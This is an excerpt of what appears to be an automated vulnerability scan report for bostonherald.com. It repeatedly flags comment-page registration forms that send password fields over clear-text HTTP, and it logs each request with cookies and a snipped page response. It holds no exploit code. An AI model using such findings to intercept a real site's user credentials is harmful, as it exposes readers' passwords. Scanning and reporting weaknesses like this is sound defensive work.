Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.2. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:57:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 76486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.3. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:16:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.4. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:01:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 75254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.5. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:29:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.6. http://bostonherald.com/news/columnists/view.bg  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/columnists/view.bg?articleid=1294590&format=comments&srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.7. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.8. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:25:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 76815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.9. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:42:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.10. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.11. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:48:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.12. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.13. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
